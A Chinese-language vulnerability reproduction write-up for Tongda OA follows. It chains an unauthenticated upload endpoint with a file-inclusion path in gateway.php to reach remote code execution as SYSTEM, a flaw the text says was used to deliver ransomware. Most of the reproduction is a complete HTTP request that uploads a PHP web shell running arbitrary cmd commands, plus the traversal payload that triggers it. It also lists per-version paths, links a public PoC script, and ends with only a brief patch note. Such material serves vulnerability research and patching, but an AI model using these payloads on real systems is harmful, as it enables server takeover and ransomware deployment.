通达OA 任意文件上传+文件包含导致RCE漏洞复现

gclome

原文链接：通达OA 任意文件上传+文件包含导致RCE漏洞复现

0X00简介

通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化系统，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。

该漏洞被黑产利用，用于投放勒索病毒。在绕过身份验证的情况下通过文件上传漏洞上传恶意php文件，组合文件包含漏洞最终造成远程代码执行漏洞，从而导致可以控制服务器system权限。

0X01漏洞概述

此漏洞是由未授权上传和本地文件包含两个漏洞组合而形成的rce漏洞

文件上传地址：http://localhost:801/ispirit/im/upload.php

本地文件包含地址：http://localhost:801/ispirit/interface/gateway.php

这个地址我看有的复现地址不一样，是/mac/gateway.php，可能和操作系统有关，需要注意下。

0X02漏洞影响版本

通达OA V11版
通达OA 2017版
通达OA 2016版
通达OA 2015版
通达OA 2013增强版
通达OA 2013版

0X03环境搭建

下载地址：

http://www.tongda2000.com/download/down.php?VERSION=2019&code=86d3V9EzrapwAKhPkxfbNZDsfB48gbFvbS0QYsUr%2FnNWNP2e5Fn%2F&F=baidu_natural&K=

安装：将下载的exe下载安装即可。（可以自定义端口，默认为80端口。）

安装完成界面：

0X04漏洞复现

直接上传：

访问任意文件上传漏洞路径/ispirit/im/upload.php

Suite抓包发送小马数据包可以看到成功上传

1. POST /ispirit/im/upload.php HTTP/1.1
   
2. 
   
3. Host: 127.0.0.1:801
   
4. 
   
5. Content-Length: 658
   
6. 
   
7. Cache-Control: no-cache
   
8. 
   
9. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
   
10. 
    
11. Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
    
12. 
    
13. Accept: */*
    
14. 
    
15. Accept-Encoding: gzip, deflate
    
16. 
    
17. Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
    
18. 
    
19. Cookie: PHPSESSID=123
    
20. 
    
21. Connection: close
    
22. 
    
23. 
    
24. 
    
25. ------WebKitFormBoundarypyfBh1YB4pV8McGB
    
26. 
    
27. Content-Disposition: form-data; name="UPLOAD_MODE"
    
28. 
    
29. 
    
30. 
    
31. 2
    
32. 
    
33. ------WebKitFormBoundarypyfBh1YB4pV8McGB
    
34. 
    
35. Content-Disposition: form-data; name="P"
    
36. 
    
37. 
    
38. 
    
39. 123
    
40. 
    
41. ------WebKitFormBoundarypyfBh1YB4pV8McGB
    
42. 
    
43. Content-Disposition: form-data; name="DEST_UID"
    
44. 
    
45. 
    
46. 
    
47. 1
    
48. 
    
49. ------WebKitFormBoundarypyfBh1YB4pV8McGB
    
50. 
    
51. Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
    
52. 
    
53. Content-Type: image/jpeg
    
54. 
    
55. 
    
56. 
    
57. <?php
    
58. 
    
59. $command=$_POST['cmd'];
    
60. 
    
61. $wsh = new COM('WScript.shell');
    
62. 
    
63. $exec = $wsh->exec("cmd /c ".$command);
    
64. 
    
65. $stdout = $exec->StdOut();
    
66. 
    
67. $stroutput = $stdout->ReadAll();
    
68. 
    
69. echo $stroutput;
    
70. 
    
71. ?>
    
72. 
    
73. ------WebKitFormBoundarypyfBh1YB4pV8McGB--

复制代码

使用Burp Suite抓包发送，构造文件包含数据包并执行命令。

1. json={"url":"/general/../../attach/im/2003/815199247.jpg"}&cmd=whoami

复制代码

命令执行成功，并且权限是system权限

也可使用poc脚本

https://github.com/fuhei/tongda_rce下载py脚本验证，使用方法如下：

注：有些版本gateway.php路径不同

如2013:

/ ispirit/ im/ upload. php

/ ispirit/ interface/ gateway . php

2017：

/ispirit/ im/ upload. php / mac/ gateway. Php

本文使用的v11版本路径为

/ispirit/im/upload.php

/ispirit/interface/gateway.php

0X05修复建议

更新官方补丁

http://www.tongda2000.com/news/673.php